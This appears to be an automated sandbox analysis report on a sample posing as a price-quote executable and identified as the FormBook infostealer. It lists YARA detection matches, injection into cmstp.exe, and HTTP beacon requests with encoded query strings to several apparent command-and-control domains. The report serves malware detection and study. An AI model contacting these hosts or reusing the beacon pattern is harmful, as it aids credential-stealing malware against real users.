Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.yelp.com

Source: unknown

DNS traffic detected: queries for: www.alivenode.com

Source: C:\Windows\explorer.exe

Code function: 16_2_10172F82 getaddrinfo,setsockopt,recv,

16_2_10172F82

Source: global traffic	HTTP traffic detected: GET /ifrg/?MZTt=HEDFe4jCYP8fdlnBQrB26YFMQNXoDtPzhFN7vn7A5A9B7sJohM6u4gXFruHbVPL0Cb9Z&jlUpT=PtkH4NF HTTP/1.1Host: www.alivenode.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ifrg/?MZTt=xSMqd057fSXzWu5wKdtIXZUKnlhHKM2qAPBglXE71Jl6YzvFk2uUy9Mdjb2m3oopWkBZ&jlUpT=PtkH4NF HTTP/1.1Host: www.75241.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ifrg/?MZTt=KnnTbyCCZFGMJEpTiCiYfsZf4Jee/pLZimTMLfkjlFBZ/SsdpxLlcqM/NBDR5bKLpT3z&jlUpT=PtkH4NF HTTP/1.1Host: www.theavenuclinic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ifrg/?MZTt=jWjPiyUc8jw17WMu1mlZUuydoLnX0svbNsscHdhrTlZXQKm/vCPlVUcnTHIU3rFeJjEe&jlUpT=PtkH4NF HTTP/1.1Host: www.bezobotnation.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ifrg/?MZTt=ah9Zs86GdfepTqxOruRY6KJXUwZDi9MhDmG697S0SgB6n7piKWqUPBRkmR/995/dCXxf&jlUpT=PtkH4NF HTTP/1.1Host: www.boat-insurance-today.worldConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ifrg/?MZTt=8SE7XcMvB9HzvYlCBNVH12K36pI2tFzG7ev9rhkff3WzzhkSbyOCO1+x97lbxB99FFNL&jlUpT=PtkH4NF HTTP/1.1Host: www.transporteturisticofradan.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ifrg/?MZTt=5jR7lvWWhXckZO8bi4azApxiCxIqQi0sZy8hVgUcz7H/XBNAH/0FPTwnmComPhSN5IMV&jlUpT=PtkH4NF HTTP/1.1Host: www.gdminsheng.icuConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ifrg/?MZTt=Jgjy4Hq2fjmR90eBASSIXnz/xCLuGnPv2f5bI+kqzTyohR3vwUCAwejwU7RKcNO0BN0L&jlUpT=PtkH4NF HTTP/1.1Host: www.dewdrop.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ifrg/?MZTt=D0BUyIgnkwa8kGN9Qj6aSRghucWXbLaIManVicGkKBrvZQsQ3EBcb5KKQY7GQNLPjnt4&jlUpT=PtkH4NF HTTP/1.1Host: www.vespeciative.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1556450459.000000000493C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1556450459.0000000003FF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3880300109.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1498050969.0000000003EC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3880157692.0000000002B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.1556450459.000000000493C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.1556450459.000000000493C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.1556450459.000000000493C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.1556450459.0000000003FF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.1556450459.0000000003FF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.1556450459.0000000003FF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.3880300109.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.3880300109.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.3880300109.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.1498050969.0000000003EC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1498050969.0000000003EC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.1498050969.0000000003EC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.3880157692.0000000002B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.3880157692.0000000002B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.3880157692.0000000002B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe PID: 7516, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe PID: 8120, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: ySqETqNvdTbE.exe PID: 8176, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: cmstp.exe PID: 1824, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe			Jump to behavior

Source: 10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.1556450459.000000000493C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.1556450459.000000000493C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.1556450459.000000000493C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.1556450459.0000000003FF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.1556450459.0000000003FF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.1556450459.0000000003FF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.3880300109.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.3880300109.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.3880300109.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.1498050969.0000000003EC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1498050969.0000000003EC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.1498050969.0000000003EC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.3880157692.0000000002B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.3880157692.0000000002B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.3880157692.0000000002B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe PID: 7516, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe PID: 8120, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: ySqETqNvdTbE.exe PID: 8176, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: cmstp.exe PID: 1824, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 1_2_072E7968	1_2_072E7968
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 1_2_072EB8F8	1_2_072EB8F8
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 1_2_072EB6F0	1_2_072EB6F0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 1_2_072E001E	1_2_072E001E
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 1_2_072E0040	1_2_072E0040
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 1_2_072EA8F8	1_2_072EA8F8
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 1_2_072E76D0	1_2_072E76D0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 1_2_0B842E5E	1_2_0B842E5E
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_0041F07E	10_2_0041F07E
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_0041E029	10_2_0041E029
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_00401030	10_2_00401030
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_0041D9FA	10_2_0041D9FA
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_0041EB60	10_2_0041EB60
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_0041EB81	10_2_0041EB81
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_00402D89	10_2_00402D89
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_00402D90	10_2_00402D90
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_00409E4B	10_2_00409E4B
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_00409E50	10_2_00409E50
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_0041D656	10_2_0041D656
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_00402FB0	10_2_00402FB0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B041A2	10_2_01B041A2
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B101AA	10_2_01B101AA
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B081CC	10_2_01B081CC
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A40100	10_2_01A40100
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AEA118	10_2_01AEA118
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AD8158	10_2_01AD8158
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AE2000	10_2_01AE2000
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A5E3F0	10_2_01A5E3F0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B103E6	10_2_01B103E6
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B0A352	10_2_01B0A352
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AD02C0	10_2_01AD02C0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AF0274	10_2_01AF0274
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B10591	10_2_01B10591
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A50535	10_2_01A50535
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AFE4F6	10_2_01AFE4F6
